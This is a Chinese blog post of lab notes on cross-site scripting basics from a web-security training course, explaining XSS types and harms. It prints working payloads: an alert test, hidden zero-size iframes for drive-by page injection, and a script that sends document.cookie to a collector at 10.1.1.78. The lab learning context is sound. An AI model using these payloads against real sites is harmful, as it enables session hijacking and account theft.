合天-web安全-xss-跨站脚本攻击基础

最新推荐文章于 2023-04-08 22:20:03 发布
最新推荐文章于 2023-04-08 22:20:03 发布
阅读量193 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38131137/article/details/105153475
版权

xss简介:
1)跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。

2)XSS工作原理

  恶意web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页面的时候,程序将数据库里面的信息输出,这些恶意代码就会被执行。

3)XSS漏洞的分类

  1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身;

  2.反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中;

  3.存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。

4)XSS攻击的危害

      1.盗取用户cookie;

      2.盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号;

      3.控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力;

      4.盗窃企业重要的具有商业价值的资料;

      5.强制发送电子邮件;

      6.网站挂马;

跨站脚本攻击基础

(这道题主要学习了网页种马的知识)
在这里插入图片描述
直接在留言版发现了存在的xss漏洞,这是存储型的xss
代码:<script>alert(1)</script>

二、网页种马

<iframe src="http://www.heetian.com"></iframe>

效果图如下
在这里插入图片描述
可以隐藏网页

<iframe src=http://www.baidu.com width="0" height="0"></iframe>

在这里插入图片描述

三、获取cookie

<script>document.write(document.cookie)</script>

如若要完成cookie的传输
代码如下

<script>document.write("<iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'></iframe>");</script>

要在网页端建立 接收的代码。

weixin_38131137
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本攻击原理与实践
m0_46625346的博客
08-09 759
XSS跨站脚本攻击原理与实践 XSS一般分为3类: 1.反射型XSS,相对来说,危害较低,需要用户点击特定的链接才能触发。 2.存储型XSS,该类XSS会把攻击代码保存到数据库,所以也叫持久型XSS,因为它存在的时间是比较长的。 3.DOM 型XSS,这类XSS主要通过修改页面的DOM节点形成XSS,称为DOM Based XSS。 反射型XSS 本步骤的页面代码: <html> <head> <meta http-equiv="Content-Type" conten
XSS跨站脚本攻击原理与实战
W_seventeen的博客
02-18 1004
XSS分类 1.反射型XSS,相对来说,危害较低,需要用户点击特定的链接才能触发。 2.存储型XSS,该类XSS会把攻击代码保存到数据库,所以也叫持久型XSS,因为它存在的时间是比较长的。 3.DOM 型XSS,这类XSS主要通过修改页面的DOM节点形成XSS,称为DOM Based XSS。 反射型XSS实战 本着见框就插的原则,我们在输入框中,写入如下简单的语句:来爆出当前的cookie值。 ...
XSS跨站脚本攻击基础
HurryPotter
07-24 473
跨站脚本攻击xss: 介绍:由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端JavaScript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害用户可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。 XSS跨站脚本攻击本身对Web服务器没有直接危害,它借助网站进行传播,使网站的大量用户受到攻...
合天-web安全-xss-xss进阶一、二、三
weixin_38131137的博客
03-28 324
xss进阶一 这题里面就是最正常的xss绕过的注入 进阶一 没有任何的防护 <script>alert(1)</script> 进阶二 将<script>与</script>转换成空。 好几种方法 1、<scri<script>pt>alert(1)</sc</script>ripot> 2、&l...
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3528
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
xss跨站脚本攻击-运维安全详细笔记
最新发布
06-30
xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结: 1.xss跨站脚本攻击的定义 ...
web安全技术-实验七、跨站脚本攻击xss)(反射型).doc
08-20
跨站脚本攻击XSS)概述】 XSS,全称Cross Site Scripting,是一种常见的Web应用程序安全漏洞,攻击者利用此漏洞向网页中注入恶意脚本,当其他用户浏览该页面时,这些脚本会被执行,从而可能窃取用户的敏感信息...
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本攻击
01-27
跨站脚本攻击XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 2393
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1170
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
实验:XSS跨站脚本攻击原理与实践 总结记录
qq_34073852的博客
06-19 2871
111
跨站脚本攻击基础 ——合天网安实验室学习笔记
weixin_42582241的博客
03-18 1113
实验链接 本实验主要介绍了跨站脚本攻击基础,通过本实验的学习,你能够了解跨站脚本攻击的概念,掌握形成跨站脚本漏洞的条件,学会对跨站脚本的几种利用方式。 链接:http://www.hetianlab.com/expc.do?ce=70c421d5-c3f4-4f4a-96c3-625e9f669255 实验简介 实验所属系列:WEB应用安全/信息安全基础/网络攻防工具 实验对象: 本科/专科信息安...
网页挂马类型
安静
06-01 1294
一:框架挂马 二:js文件挂马首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为 三:js变形加密 muma.txt可改成任意后缀四:body挂马五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + /r/n;六:css中挂马body { background-image: ur
如何防止跨站点脚本 (XSS) 攻击完整指南
allway2的博客
07-24 2620
XSS被认为是最危险的攻击之一,因为它的主要目的是窃取网站或系统的用户身份。在这种类型的攻击中,恶意代码或脚本被保存在网络服务器上(例如,在数据库中),并在用户每次调用适当的功能时执行。根据我的软件测试经验,我想补充一点,如果选择了一个好的黑盒测试技术并准确地执行,那么这应该足够了。如果恶意用户将此脚本注入网站代码,那么它将在用户的浏览器中执行,并将cookie发送给恶意用户。重要的是要记住,结果意味着什么,应用程序是易受攻击的,它会彻底分析结果。但是,插件被认为是检查此类攻击的相当薄弱的工具。...
跨站脚本攻击基础
giantbranch的专栏
05-20 8167
实验来源:合天网安实验室 实验目的什么的就自己过去看啊 这里把预备知识粘贴过来吧 预备知识       1)跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。       2)XSS工作原理       恶意web用户将代码植入到提供给其它用户使用的页面中,如
XSS跨站脚本攻击过程的讲解
whucaodi的专栏
12-17 3116
跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。以下为能够演示器原理的完整样例:1.角色分配有XSS漏洞的网站 受害访问者。也就是浏览器 黑客的数据接受网站2.源码实例2.1漏洞网站漏洞网站:http://localhost/xss.php<?php session_start(); ?> <!doctype html> <html> <head> <t
结合测试题分析XSS跨站脚本攻击几种常见手段(内附https://xss.haozi.me/试题答案)
wyhstars的博客
07-06 2164
欢迎使用Markdown编辑器写博客 本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I...
XSS攻击详解:跨站脚本危害与类型分析
"xss跨站脚本攻击-运维安全详细笔记" XSS(Cross-site scripting)跨站脚本攻击是一种常见的网络安全威胁,它利用Web应用程序未能充分验证和过滤用户输入的情况。攻击者通过在网页上注入恶意脚本,使得其他用户在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值